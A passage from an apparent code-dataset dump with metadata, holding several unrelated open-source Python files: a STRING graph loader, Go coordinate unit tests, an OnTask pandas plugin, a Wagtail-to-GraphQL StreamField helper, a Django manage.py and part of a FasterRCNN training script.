from ...ensmallen import Graph # pylint: disable=import-error
def SphingomonasHankookensis(
directed: bool = False,
preprocess: bool = True,
load_nodes: bool = True,
verbose: int = 2,
cache: bool = True,
cache_path: str = "graphs/string",
version: str = "links.v11.5",
**additional_graph_kwargs: Dict
) -> Graph:
"""Return new instance of the Sphingomonas hankookensis graph.
The graph is automatically retrieved from the STRING repository.
Parameters
-------------------
directed: bool = False
Wether to load the graph as directed or undirected.
By default false.
preprocess: bool = True
Whether to preprocess the graph to be loaded in
optimal time and memory.
load_nodes: bool = True,
Whether to load the nodes vocabulary or treat the nodes
simply as a numeric range.
verbose: int = 2,
Wether to show loading bars during the retrieval and building
of the graph.
cache: bool = True
Whether to use cache, i.e. download files only once
and preprocess them only once.
cache_path: str = "graphs"
Where to store the downloaded graphs.
version: str = "links.v11.5"
The version of the graph to retrieve.
The available versions are:
- homology.v11.5
- physical.links.v11.5
- links.v11.5
additional_graph_kwargs: Dict
Additional graph kwargs.
Returns
-----------------------
Instace of Sphingomonas hankookensis graph.
References
---------------------
Please cite the following if you use the data:
```bib
@article{szklarczyk2019string,
title={STRING v11: protein--protein association networks with increased coverage, supporting functional discovery in genome-wide experimental datasets},
author={Szklarczyk, Damian and Gable, Annika L and Lyon, David and Junge, Alexander and Wyder, Stefan and Huerta-Cepas, Jaime and Simonovic, Milan and Doncheva, Nadezhda T and Morris, John H and Bork, Peer and others},
journal={Nucleic acids research},
volume={47},
number={D1},
pages={D607--D613},
year={2019},
publisher={Oxford University Press}
}
```
"""
return AutomaticallyRetrievedGraph(
graph_name="SphingomonasHankookensis",
repository="string",
version=version,
directed=directed,
preprocess=preprocess,
load_nodes=load_nodes,
verbose=verbose,
cache=cache,
cache_path=cache_path,
additional_graph_kwargs=additional_graph_kwargs
)()
| 33.342857
| 223
| 0.680377
|
from typing import Dict
from ..automatic_graph_retrieval import AutomaticallyRetrievedGraph
from ...ensmallen import Graph
def SphingomonasHankookensis(
directed: bool = False,
preprocess: bool = True,
load_nodes: bool = True,
verbose: int = 2,
cache: bool = True,
cache_path: str = "graphs/string",
version: str = "links.v11.5",
**additional_graph_kwargs: Dict
) -> Graph:
return AutomaticallyRetrievedGraph(
graph_name="SphingomonasHankookensis",
repository="string",
version=version,
directed=directed,
preprocess=preprocess,
load_nodes=load_nodes,
verbose=verbose,
cache=cache,
cache_path=cache_path,
additional_graph_kwargs=additional_graph_kwargs
)()
| true
| true
|
f70b70c4057ddb22121863cfd747a26613e1e6ec
| 4,612
|
py
|
Python
|
tests/test_coords.py
|
awesome-archive/minigo
|
188fb197fdafbe9664a32142373b1cbd1459bc67
|
[
"Apache-2.0"
] | null | null | null |
tests/test_coords.py
|
awesome-archive/minigo
|
188fb197fdafbe9664a32142373b1cbd1459bc67
|
[
"Apache-2.0"
] | null | null | null |
tests/test_coords.py
|
awesome-archive/minigo
|
188fb197fdafbe9664a32142373b1cbd1459bc67
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2018 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import numpy
import coords
import go
from tests import test_utils
class TestCoords(test_utils.MiniGoUnitTest):
def test_upperleft(self):
self.assertEqual(coords.parse_sgf_coords('aa'), (0, 0))
self.assertEqual(coords.unflatten_coords(0), (0, 0))
self.assertEqual(coords.parse_kgs_coords('A9'), (0, 0))
self.assertEqual(coords.parse_pygtp_coords((1,9)), (0, 0))
self.assertEqual(coords.unparse_sgf_coords((0, 0)), 'aa')
self.assertEqual(coords.flatten_coords((0, 0)), 0)
self.assertEqual(coords.to_human_coord((0, 0)), 'A9')
self.assertEqual(coords.unparse_pygtp_coords((0, 0)), (1, 9))
def test_topleft(self):
self.assertEqual(coords.parse_sgf_coords('ia'), (0, 8))
self.assertEqual(coords.unflatten_coords(8), (0, 8))
self.assertEqual(coords.parse_kgs_coords('J9'), (0, 8))
self.assertEqual(coords.parse_pygtp_coords((9,9)), (0, 8))
self.assertEqual(coords.unparse_sgf_coords((0, 8)), 'ia')
self.assertEqual(coords.flatten_coords((0, 8)), 8)
self.assertEqual(coords.to_human_coord((0, 8)), 'J9')
self.assertEqual(coords.unparse_pygtp_coords((0, 8)), (9, 9))
def test_pass(self):
self.assertEqual(coords.parse_sgf_coords(''), None)
self.assertEqual(coords.unflatten_coords(81), None)
self.assertEqual(coords.parse_kgs_coords('pass'), None)
self.assertEqual(coords.parse_pygtp_coords((0,0)), None)
self.assertEqual(coords.unparse_sgf_coords(None), '')
self.assertEqual(coords.flatten_coords(None), 81)
self.assertEqual(coords.to_human_coord(None), 'pass')
self.assertEqual(coords.unparse_pygtp_coords(None), (0, 0))
def test_parsing_9x9(self):
self.assertEqual(coords.parse_sgf_coords('aa'), (0, 0))
self.assertEqual(coords.parse_sgf_coords('ac'), (2, 0))
self.assertEqual(coords.parse_sgf_coords('ca'), (0, 2))
self.assertEqual(coords.parse_sgf_coords(''), None)
self.assertEqual(coords.unparse_sgf_coords(None), '')
self.assertEqual(
'aa',
coords.unparse_sgf_coords(coords.parse_sgf_coords('aa')))
self.assertEqual(
'sa',
coords.unparse_sgf_coords(coords.parse_sgf_coords('sa')))
self.assertEqual(
(1, 17),
coords.parse_sgf_coords(coords.unparse_sgf_coords((1, 17))))
self.assertEqual(coords.parse_kgs_coords('A1'), (8, 0))
self.assertEqual(coords.parse_kgs_coords('A9'), (0, 0))
self.assertEqual(coords.parse_kgs_coords('C2'), (7, 2))
self.assertEqual(coords.parse_kgs_coords('J2'), (7, 8))
self.assertEqual(coords.parse_pygtp_coords((1, 1)), (8, 0))
self.assertEqual(coords.parse_pygtp_coords((1, 9)), (0, 0))
self.assertEqual(coords.parse_pygtp_coords((3, 2)), (7, 2))
self.assertEqual(coords.unparse_pygtp_coords((8, 0)), (1, 1))
self.assertEqual(coords.unparse_pygtp_coords((0, 0)), (1, 9))
self.assertEqual(coords.unparse_pygtp_coords((7, 2)), (3, 2))
self.assertEqual(coords.to_human_coord((0,8)), 'J9')
self.assertEqual(coords.to_human_coord((8,0)), 'A1')
def test_flatten(self):
self.assertEqual(coords.flatten_coords((0, 0)), 0)
self.assertEqual(coords.flatten_coords((0, 3)), 3)
self.assertEqual(coords.flatten_coords((3, 0)), 27)
self.assertEqual(coords.unflatten_coords(27), (3, 0))
self.assertEqual(coords.unflatten_coords(10), (1, 1))
self.assertEqual(coords.unflatten_coords(80), (8, 8))
self.assertEqual(coords.flatten_coords(coords.unflatten_coords(10)), 10)
self.assertEqual(coords.unflatten_coords(coords.flatten_coords((5, 4))), (5, 4))
def test_unflatten_coords_ndindex_equivalence(self):
ndindices = list(numpy.ndindex(go.N, go.N))
flat_coords = list(range(go.N * go.N))
self.assertEqual(list(map(coords.unflatten_coords, flat_coords)), ndindices)
| 46.12
| 88
| 0.670425
|
import unittest
import numpy
import coords
import go
from tests import test_utils
class TestCoords(test_utils.MiniGoUnitTest):
def test_upperleft(self):
self.assertEqual(coords.parse_sgf_coords('aa'), (0, 0))
self.assertEqual(coords.unflatten_coords(0), (0, 0))
self.assertEqual(coords.parse_kgs_coords('A9'), (0, 0))
self.assertEqual(coords.parse_pygtp_coords((1,9)), (0, 0))
self.assertEqual(coords.unparse_sgf_coords((0, 0)), 'aa')
self.assertEqual(coords.flatten_coords((0, 0)), 0)
self.assertEqual(coords.to_human_coord((0, 0)), 'A9')
self.assertEqual(coords.unparse_pygtp_coords((0, 0)), (1, 9))
def test_topleft(self):
self.assertEqual(coords.parse_sgf_coords('ia'), (0, 8))
self.assertEqual(coords.unflatten_coords(8), (0, 8))
self.assertEqual(coords.parse_kgs_coords('J9'), (0, 8))
self.assertEqual(coords.parse_pygtp_coords((9,9)), (0, 8))
self.assertEqual(coords.unparse_sgf_coords((0, 8)), 'ia')
self.assertEqual(coords.flatten_coords((0, 8)), 8)
self.assertEqual(coords.to_human_coord((0, 8)), 'J9')
self.assertEqual(coords.unparse_pygtp_coords((0, 8)), (9, 9))
def test_pass(self):
self.assertEqual(coords.parse_sgf_coords(''), None)
self.assertEqual(coords.unflatten_coords(81), None)
self.assertEqual(coords.parse_kgs_coords('pass'), None)
self.assertEqual(coords.parse_pygtp_coords((0,0)), None)
self.assertEqual(coords.unparse_sgf_coords(None), '')
self.assertEqual(coords.flatten_coords(None), 81)
self.assertEqual(coords.to_human_coord(None), 'pass')
self.assertEqual(coords.unparse_pygtp_coords(None), (0, 0))
def test_parsing_9x9(self):
self.assertEqual(coords.parse_sgf_coords('aa'), (0, 0))
self.assertEqual(coords.parse_sgf_coords('ac'), (2, 0))
self.assertEqual(coords.parse_sgf_coords('ca'), (0, 2))
self.assertEqual(coords.parse_sgf_coords(''), None)
self.assertEqual(coords.unparse_sgf_coords(None), '')
self.assertEqual(
'aa',
coords.unparse_sgf_coords(coords.parse_sgf_coords('aa')))
self.assertEqual(
'sa',
coords.unparse_sgf_coords(coords.parse_sgf_coords('sa')))
self.assertEqual(
(1, 17),
coords.parse_sgf_coords(coords.unparse_sgf_coords((1, 17))))
self.assertEqual(coords.parse_kgs_coords('A1'), (8, 0))
self.assertEqual(coords.parse_kgs_coords('A9'), (0, 0))
self.assertEqual(coords.parse_kgs_coords('C2'), (7, 2))
self.assertEqual(coords.parse_kgs_coords('J2'), (7, 8))
self.assertEqual(coords.parse_pygtp_coords((1, 1)), (8, 0))
self.assertEqual(coords.parse_pygtp_coords((1, 9)), (0, 0))
self.assertEqual(coords.parse_pygtp_coords((3, 2)), (7, 2))
self.assertEqual(coords.unparse_pygtp_coords((8, 0)), (1, 1))
self.assertEqual(coords.unparse_pygtp_coords((0, 0)), (1, 9))
self.assertEqual(coords.unparse_pygtp_coords((7, 2)), (3, 2))
self.assertEqual(coords.to_human_coord((0,8)), 'J9')
self.assertEqual(coords.to_human_coord((8,0)), 'A1')
def test_flatten(self):
self.assertEqual(coords.flatten_coords((0, 0)), 0)
self.assertEqual(coords.flatten_coords((0, 3)), 3)
self.assertEqual(coords.flatten_coords((3, 0)), 27)
self.assertEqual(coords.unflatten_coords(27), (3, 0))
self.assertEqual(coords.unflatten_coords(10), (1, 1))
self.assertEqual(coords.unflatten_coords(80), (8, 8))
self.assertEqual(coords.flatten_coords(coords.unflatten_coords(10)), 10)
self.assertEqual(coords.unflatten_coords(coords.flatten_coords((5, 4))), (5, 4))
def test_unflatten_coords_ndindex_equivalence(self):
ndindices = list(numpy.ndindex(go.N, go.N))
flat_coords = list(range(go.N * go.N))
self.assertEqual(list(map(coords.unflatten_coords, flat_coords)), ndindices)
| true
| true
|
f70b7227b620424d036d27f17a1cc64db679149c
| 4,193
|
py
|
Python
|
src/plugins/test_plugin_2/__init__.py
|
ShizhuZhang/ontask_b
|
acbf05ff9b18dae0a41c67d1e41774e54a890c40
|
[
"MIT"
] | 3
|
2018-08-24T10:48:40.000Z
|
2020-05-29T06:33:23.000Z
|
src/plugins/test_plugin_2/__init__.py
|
ShizhuZhang/Ontask_b_zh
|
ca4526871f26e7153b724b1e97b922a0b52f75d6
|
[
"MIT"
] | null | null | null |
src/plugins/test_plugin_2/__init__.py
|
ShizhuZhang/Ontask_b_zh
|
ca4526871f26e7153b724b1e97b922a0b52f75d6
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals, print_function
import pandas as pd
# The field class_name contains the name of the class to load to execute the
# plugin.
class_name = 'OntaskTestPlugin'
class OntaskTestPlugin(object):
"""
Example of a class that implements the OnTask plugin interface. The
objects of this class have to provide the following elements:
1. name: Plugin name show to the users.
2. description_txt: A string with the detailed description of what the
plugin does
3. input_column_names: A potentially empty list of column names (strings).
If the list is empty, the columns are selected by the userat execution
time.
4. output_column_names: Non empty list of names (strings) of the columns
to be used for the output of the transformation.
5. parameters: an optionally empty list with tuples with the following
structure:
('name', type, [list of allowed values], initial value, help_text)
These elements will be requested from the user before executing the
plugin through a form. The conditions on these values are:
- name must be a string
- type must be a string equal to "integer", "double", "string",
"datetime" or "boolean".
- The list of values is to restrict the
possible values
- The initial value must be of the type specified by the second
element.
- Help_text a string to show as help text
6. method "run" that receives:
- a pandas data frame with the data to process
- a string with the name of the key column that will be used to merge
the result.
- A dictionary of pairs (name, value) with the parameters described in
the previous element.
and returns a result Pandas data frame. This frame **must** have one
column with the key column name provided so that it can be properly
merged with the existing data.
"""
def __init__(self):
self.name = 'Test Plungin 2 Name'
self.description_txt = 'Test Plugin 2 Description Text'
self.input_column_names = ['A1', 'A2']
self.output_column_names = ['RESULT 3', 'RESULT 4']
self.parameters = [
('param string', 'string', ['v1', 'v2'], 'v1', 'help param string'),
('param integer', 'integer', [], None, 'help param integer'),
('param double', 'double', [1.2, 2.2, 3.2], None,
'help param double'),
('param boolean', 'boolean', [], True, 'help param boolean'),
('param datetime', 'datetime', [], '2018-05-25 18:03:00+09:30',
'help param datetime'),
('param datetime2', 'datetime',
[],
'2018-05-25 18:03:00+09:30',
'help param datetime'),
]
def run(self, data_frame, merge_key, parameters=dict):
"""
Method to overwrite. Receives a data frame wih a number of columns
stipulated by the num_column_input pair, the name of a key column and a
dictionary with parameters of the form name, value.
Runs the algorithm and returns a pandas data frame structure that is
merged with the existing data frame in the workflow using the merge_key.
:param data_frame: Input data for the plugin
:param merge_key: Name of the column key that will be used for merging
:param parameters: Dictionary with (name, value) pairs.
:return: a Pandas data_frame to merge with the existing one (must
contain a column with name merge_key)
"""
# Extract the key column from the given data frame
result = pd.DataFrame(data_frame[merge_key])
# Process the given data and create the result
result[self.output_column_names[0]] = \
data_frame[self.input_column_names[0]] + \
data_frame[self.input_column_names[1]]
result[self.output_column_names[1]] = \
data_frame[self.input_column_names[0]] - \
data_frame[self.input_column_names[1]]
return result
| 39.933333
| 80
| 0.632721
|
from __future__ import unicode_literals, print_function
import pandas as pd
class_name = 'OntaskTestPlugin'
class OntaskTestPlugin(object):
def __init__(self):
self.name = 'Test Plungin 2 Name'
self.description_txt = 'Test Plugin 2 Description Text'
self.input_column_names = ['A1', 'A2']
self.output_column_names = ['RESULT 3', 'RESULT 4']
self.parameters = [
('param string', 'string', ['v1', 'v2'], 'v1', 'help param string'),
('param integer', 'integer', [], None, 'help param integer'),
('param double', 'double', [1.2, 2.2, 3.2], None,
'help param double'),
('param boolean', 'boolean', [], True, 'help param boolean'),
('param datetime', 'datetime', [], '2018-05-25 18:03:00+09:30',
'help param datetime'),
('param datetime2', 'datetime',
[],
'2018-05-25 18:03:00+09:30',
'help param datetime'),
]
def run(self, data_frame, merge_key, parameters=dict):
result = pd.DataFrame(data_frame[merge_key])
result[self.output_column_names[0]] = \
data_frame[self.input_column_names[0]] + \
data_frame[self.input_column_names[1]]
result[self.output_column_names[1]] = \
data_frame[self.input_column_names[0]] - \
data_frame[self.input_column_names[1]]
return result
| true
| true
|
f70b72e4d5f4604427e2f7259e15eaf0fc83e22f
| 3,735
|
py
|
Python
|
strawberry_wagtail/stream_field.py
|
patrick91/strawberry-wagtail
|
cfb94cd09be32dc720bda2d366aa8824f7d3ea5c
|
[
"MIT"
] | 22
|
2022-03-25T08:32:04.000Z
|
2022-03-31T03:01:49.000Z
|
strawberry_wagtail/stream_field.py
|
patrick91/strawberry-wagtail
|
cfb94cd09be32dc720bda2d366aa8824f7d3ea5c
|
[
"MIT"
] | 6
|
2022-03-25T03:32:03.000Z
|
2022-03-25T15:21:20.000Z
|
strawberry_wagtail/stream_field.py
|
patrick91/strawberry-wagtail
|
cfb94cd09be32dc720bda2d366aa8824f7d3ea5c
|
[
"MIT"
] | null | null | null |
import dataclasses
from typing import Any, Callable, List, Optional, Type
from wagtail.core.blocks.field_block import CharBlock, FieldBlock, RichTextBlock
from wagtail.core.blocks.stream_block import StreamBlock
from wagtail.core.fields import StreamField
from wagtail.images.blocks import ImageChooserBlock
import strawberry
import strawberry.django
from strawberry.union import StrawberryUnion
from strawberry.utils.str_converters import capitalize_first, to_camel_case
from .scalars import HTML
def _make_type(
class_name: str, value_field_name: str, value_type: Type, from_data: Callable
) -> Type:
# TODO: don't use dataclasses
x = dataclasses.make_dataclass(
class_name, [("id", strawberry.ID), (value_field_name, value_type)]
)
x.from_data = classmethod(from_data)
return strawberry.type(x)
def get_type_for_stream_block(
block: StreamBlock,
class_name: str,
) -> Type:
types = set()
block_map = {}
for field_block in block.child_blocks.values():
name = class_name + capitalize_first(to_camel_case(field_block.name))
type_ = _get_type_for_field_block(field_block, name)
if isinstance(type_, StrawberryUnion):
assert type_.graphql_name
type_.graphql_name += "Values"
type_ = _make_type(name, "values", List[type_], None)
block_map[field_block.name] = type_
types.add(type_)
union_type = strawberry.union(
class_name, types=tuple(sorted(types, key=lambda x: str(x)))
)
union_type._block_map = block_map
return union_type
def _get_type_for_field_block(field_block: FieldBlock, name: str) -> Optional[Type]:
type_ = None
if isinstance(field_block, CharBlock):
def from_data(cls, data: dict) -> str:
return cls(id=data["id"], value=data["value"])
type_ = _make_type(name, "value", str, from_data)
elif isinstance(field_block, RichTextBlock):
def from_data(cls, data: dict) -> str:
return cls(id=data["id"], html=data["value"])
type_ = _make_type(name, "html", HTML, from_data)
elif isinstance(field_block, ImageChooserBlock):
def from_data(cls, data: dict) -> str:
return cls(id=data["id"], image=data["value"])
type_ = _make_type(name, "image", str, from_data)
elif isinstance(field_block, StreamBlock):
type_ = get_type_for_stream_block(field_block, name)
if type_ is None:
raise ValueError(f"Unknown type for {field_block}")
type_._origin_field_block = field_block # type: ignore
return type_
def _get_block(block: dict, parent_type: Type) -> Any:
block_type = parent_type._block_map.get(block["type"])
if not block_type:
return None
block_data = block.copy()
block_data.pop("type")
if type(block["value"]) is list:
# mmm
print("🌼🌼🌼")
print(block_type._type_definition.fields[1].__dict__)
block_value_type = block_type._type_definition.fields[1].type.of_type
value = [
_get_block(sub_block, block_value_type) for sub_block in block["value"]
]
print(block_type)
print(block_value_type)
print(value)
return block_type(id=block_data["id"], values=value)
return block_type.from_data(block_data)
def get_resolver_for_stream_field(field: StreamField, type: Type) -> Callable:
def _resolver(root: Any) -> List[type]:
raw_data = getattr(root, field.name)._raw_data
data = []
for block in raw_data:
block_data = _get_block(block, type)
if block_data:
data.append(block_data)
return data
return _resolver
| 27.463235
| 84
| 0.672825
|
import dataclasses
from typing import Any, Callable, List, Optional, Type
from wagtail.core.blocks.field_block import CharBlock, FieldBlock, RichTextBlock
from wagtail.core.blocks.stream_block import StreamBlock
from wagtail.core.fields import StreamField
from wagtail.images.blocks import ImageChooserBlock
import strawberry
import strawberry.django
from strawberry.union import StrawberryUnion
from strawberry.utils.str_converters import capitalize_first, to_camel_case
from .scalars import HTML
def _make_type(
class_name: str, value_field_name: str, value_type: Type, from_data: Callable
) -> Type:
x = dataclasses.make_dataclass(
class_name, [("id", strawberry.ID), (value_field_name, value_type)]
)
x.from_data = classmethod(from_data)
return strawberry.type(x)
def get_type_for_stream_block(
block: StreamBlock,
class_name: str,
) -> Type:
types = set()
block_map = {}
for field_block in block.child_blocks.values():
name = class_name + capitalize_first(to_camel_case(field_block.name))
type_ = _get_type_for_field_block(field_block, name)
if isinstance(type_, StrawberryUnion):
assert type_.graphql_name
type_.graphql_name += "Values"
type_ = _make_type(name, "values", List[type_], None)
block_map[field_block.name] = type_
types.add(type_)
union_type = strawberry.union(
class_name, types=tuple(sorted(types, key=lambda x: str(x)))
)
union_type._block_map = block_map
return union_type
def _get_type_for_field_block(field_block: FieldBlock, name: str) -> Optional[Type]:
type_ = None
if isinstance(field_block, CharBlock):
def from_data(cls, data: dict) -> str:
return cls(id=data["id"], value=data["value"])
type_ = _make_type(name, "value", str, from_data)
elif isinstance(field_block, RichTextBlock):
def from_data(cls, data: dict) -> str:
return cls(id=data["id"], html=data["value"])
type_ = _make_type(name, "html", HTML, from_data)
elif isinstance(field_block, ImageChooserBlock):
def from_data(cls, data: dict) -> str:
return cls(id=data["id"], image=data["value"])
type_ = _make_type(name, "image", str, from_data)
elif isinstance(field_block, StreamBlock):
type_ = get_type_for_stream_block(field_block, name)
if type_ is None:
raise ValueError(f"Unknown type for {field_block}")
type_._origin_field_block = field_block # type: ignore
return type_
def _get_block(block: dict, parent_type: Type) -> Any:
block_type = parent_type._block_map.get(block["type"])
if not block_type:
return None
block_data = block.copy()
block_data.pop("type")
if type(block["value"]) is list:
# mmm
print("🌼🌼🌼")
print(block_type._type_definition.fields[1].__dict__)
block_value_type = block_type._type_definition.fields[1].type.of_type
value = [
_get_block(sub_block, block_value_type) for sub_block in block["value"]
]
print(block_type)
print(block_value_type)
print(value)
return block_type(id=block_data["id"], values=value)
return block_type.from_data(block_data)
def get_resolver_for_stream_field(field: StreamField, type: Type) -> Callable:
def _resolver(root: Any) -> List[type]:
raw_data = getattr(root, field.name)._raw_data
data = []
for block in raw_data:
block_data = _get_block(block, type)
if block_data:
data.append(block_data)
return data
return _resolver
| true
| true
|
f70b734b40b8db78f6f6d0cfd6df74f70c01ab5f
| 804
|
py
|
Python
|
irs990/manage.py
|
jsfenfen/irs990_admin
|
40eae9e04af35f0b047b4e85b0cb41ef294a3eeb
|
[
"Apache-2.0"
] | null | null | null |
irs990/manage.py
|
jsfenfen/irs990_admin
|
40eae9e04af35f0b047b4e85b0cb41ef294a3eeb
|
[
"Apache-2.0"
] | 5
|
2018-04-11T20:46:48.000Z
|
2020-04-28T11:57:06.000Z
|
irs990/manage.py
|
jsfenfen/irs990_admin
|
40eae9e04af35f0b047b4e85b0cb41ef294a3eeb
|
[
"Apache-2.0"
] | 5
|
2018-04-10T21:34:01.000Z
|
2020-09-29T17:47:21.000Z
|
#!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "irs990.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
# The above import may fail for some other reason. Ensure that the
# issue is really that Django is missing to avoid masking other
# exceptions on Python 2.
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| 34.956522
| 77
| 0.641791
|
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "irs990.settings")
try:
from django.core.management import execute_from_command_line
except ImportError:
try:
import django
except ImportError:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
)
raise
execute_from_command_line(sys.argv)
| true
| true
|
f70b74bcb3342cafe7f11ffe27d5eb119c2c1352
| 23,631
|
py
|
Python
|
examples/FasterRCNN/train.py
|
bzamecnik/tensorpack
|
e9a3c2b3cd441e5b288607b44f2fe44fbf3ad4bb
|
[
"Apache-2.0"
] | null | null | null |
examples/FasterRCNN/train.py
|
bzamecnik/tensorpack
|
e9a3c2b3cd441e5b288607b44f2fe44fbf3ad4bb
|
[
"Apache-2.0"
] | null | null | null |
examples/FasterRCNN/train.py
|
bzamecnik/tensorpack
|
e9a3c2b3cd441e5b288607b44f2fe44fbf3ad4bb
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# File: train.py
import argparse
import itertools
import numpy as np
import os
import shutil
import cv2
import six
assert six.PY3, "FasterRCNN requires Python 3!"
import tensorflow as tf
import tqdm
import tensorpack.utils.viz as tpviz
from tensorpack import *
from tensorpack.tfutils import optimizer, collect_env_info
from tensorpack.tfutils.common import get_tf_version_tuple
from tensorpack.tfutils.summary import add_moving_summary
import model_frcnn
import model_mrcnn
from basemodel import image_preprocess, resnet_c4_backbone, resnet_conv5, resnet_fpn_backbone
from dataset import DetectionDataset
from config import finalize_configs, config as cfg
from data import get_all_anchors, get_all_anchors_fpn, get_eval_dataflow, get_train_dataflow
from eval import DetectionResult, predict_image, multithread_predict_dataflow, EvalCallback
from model_box import RPNAnchors, clip_boxes, crop_and_resize, roi_align
from model_cascade import CascadeRCNNHead
from model_fpn import fpn_model, generate_fpn_proposals, multilevel_roi_align, multilevel_rpn_losses
from model_frcnn import BoxProposals, FastRCNNHead, fastrcnn_outputs, fastrcnn_predictions, sample_fast_rcnn_targets
from model_mrcnn import maskrcnn_loss, maskrcnn_upXconv_head
from model_rpn import generate_rpn_proposals, rpn_head, rpn_losses
from viz import draw_annotation, draw_final_outputs, draw_predictions, draw_proposal_recall
try:
import horovod.tensorflow as hvd
except ImportError:
pass
class DetectionModel(ModelDesc):
def preprocess(self, image):
image = tf.expand_dims(image, 0)
image = image_preprocess(image, bgr=True)
return tf.transpose(image, [0, 3, 1, 2])
@property
def training(self):
return get_current_tower_context().is_training
def optimizer(self):
lr = tf.get_variable('learning_rate', initializer=0.003, trainable=False)
tf.summary.scalar('learning_rate-summary', lr)
# The learning rate in the config is set for 8 GPUs, and we use trainers with average=False.
lr = lr / 8.
opt = tf.train.MomentumOptimizer(lr, 0.9)
if cfg.TRAIN.NUM_GPUS < 8:
opt = optimizer.AccumGradOptimizer(opt, 8 // cfg.TRAIN.NUM_GPUS)
return opt
def get_inference_tensor_names(self):
"""
Returns two lists of tensor names to be used to create an inference callable.
Returns:
[str]: input names
[str]: output names
"""
out = ['output/boxes', 'output/scores', 'output/labels']
if cfg.MODE_MASK:
out.append('output/masks')
return ['image'], out
def build_graph(self, *inputs):
inputs = dict(zip(self.input_names, inputs))
image = self.preprocess(inputs['image']) # 1CHW
features = self.backbone(image)
anchor_inputs = {k: v for k, v in inputs.items() if k.startswith('anchor_')}
proposals, rpn_losses = self.rpn(image, features, anchor_inputs) # inputs?
targets = [inputs[k] for k in ['gt_boxes', 'gt_labels', 'gt_masks'] if k in inputs]
head_losses = self.roi_heads(image, features, proposals, targets)
if self.training:
wd_cost = regularize_cost(
'.*/W', l2_regularizer(cfg.TRAIN.WEIGHT_DECAY), name='wd_cost')
total_cost = tf.add_n(
rpn_losses + head_losses + [wd_cost], 'total_cost')
add_moving_summary(total_cost, wd_cost)
return total_cost
class ResNetC4Model(DetectionModel):
def inputs(self):
ret = [
tf.TensorSpec((None, None, 3), tf.float32, 'image'),
tf.TensorSpec((None, None, cfg.RPN.NUM_ANCHOR), tf.int32, 'anchor_labels'),
tf.TensorSpec((None, None, cfg.RPN.NUM_ANCHOR, 4), tf.float32, 'anchor_boxes'),
tf.TensorSpec((None, 4), tf.float32, 'gt_boxes'),
tf.TensorSpec((None,), tf.int64, 'gt_labels')] # all > 0
if cfg.MODE_MASK:
ret.append(
tf.TensorSpec((None, None, None), tf.uint8, 'gt_masks')
) # NR_GT x height x width
return ret
def backbone(self, image):
return [resnet_c4_backbone(image, cfg.BACKBONE.RESNET_NUM_BLOCKS[:3])]
def rpn(self, image, features, inputs):
featuremap = features[0]
rpn_label_logits, rpn_box_logits = rpn_head('rpn', featuremap, cfg.RPN.HEAD_DIM, cfg.RPN.NUM_ANCHOR)
anchors = RPNAnchors(get_all_anchors(), inputs['anchor_labels'], inputs['anchor_boxes'])
anchors = anchors.narrow_to(featuremap)
image_shape2d = tf.shape(image)[2:] # h,w
pred_boxes_decoded = anchors.decode_logits(rpn_box_logits) # fHxfWxNAx4, floatbox
proposal_boxes, proposal_scores = generate_rpn_proposals(
tf.reshape(pred_boxes_decoded, [-1, 4]),
tf.reshape(rpn_label_logits, [-1]),
image_shape2d,
cfg.RPN.TRAIN_PRE_NMS_TOPK if self.training else cfg.RPN.TEST_PRE_NMS_TOPK,
cfg.RPN.TRAIN_POST_NMS_TOPK if self.training else cfg.RPN.TEST_POST_NMS_TOPK)
if self.training:
losses = rpn_losses(
anchors.gt_labels, anchors.encoded_gt_boxes(), rpn_label_logits, rpn_box_logits)
else:
losses = []
return BoxProposals(proposal_boxes), losses
def roi_heads(self, image, features, proposals, targets):
image_shape2d = tf.shape(image)[2:] # h,w
featuremap = features[0]
gt_boxes, gt_labels, *_ = targets
if self.training:
# sample proposal boxes in training
proposals = sample_fast_rcnn_targets(proposals.boxes, gt_boxes, gt_labels)
# The boxes to be used to crop RoIs.
# Use all proposal boxes in inference
boxes_on_featuremap = proposals.boxes * (1.0 / cfg.RPN.ANCHOR_STRIDE)
roi_resized = roi_align(featuremap, boxes_on_featuremap, 14)
feature_fastrcnn = resnet_conv5(roi_resized, cfg.BACKBONE.RESNET_NUM_BLOCKS[-1]) # nxcx7x7
# Keep C5 feature to be shared with mask branch
feature_gap = GlobalAvgPooling('gap', feature_fastrcnn, data_format='channels_first')
fastrcnn_label_logits, fastrcnn_box_logits = fastrcnn_outputs('fastrcnn', feature_gap, cfg.DATA.NUM_CLASS)
fastrcnn_head = FastRCNNHead(proposals, fastrcnn_box_logits, fastrcnn_label_logits, gt_boxes,
tf.constant(cfg.FRCNN.BBOX_REG_WEIGHTS, dtype=tf.float32))
if self.training:
all_losses = fastrcnn_head.losses()
if cfg.MODE_MASK:
gt_masks = targets[2]
# maskrcnn loss
# In training, mask branch shares the same C5 feature.
fg_feature = tf.gather(feature_fastrcnn, proposals.fg_inds())
mask_logits = maskrcnn_upXconv_head(
'maskrcnn', fg_feature, cfg.DATA.NUM_CATEGORY, num_convs=0) # #fg x #cat x 14x14
target_masks_for_fg = crop_and_resize(
tf.expand_dims(gt_masks, 1),
proposals.fg_boxes(),
proposals.fg_inds_wrt_gt, 14,
pad_border=False) # nfg x 1x14x14
target_masks_for_fg = tf.squeeze(target_masks_for_fg, 1, 'sampled_fg_mask_targets')
all_losses.append(maskrcnn_loss(mask_logits, proposals.fg_labels(), target_masks_for_fg))
return all_losses
else:
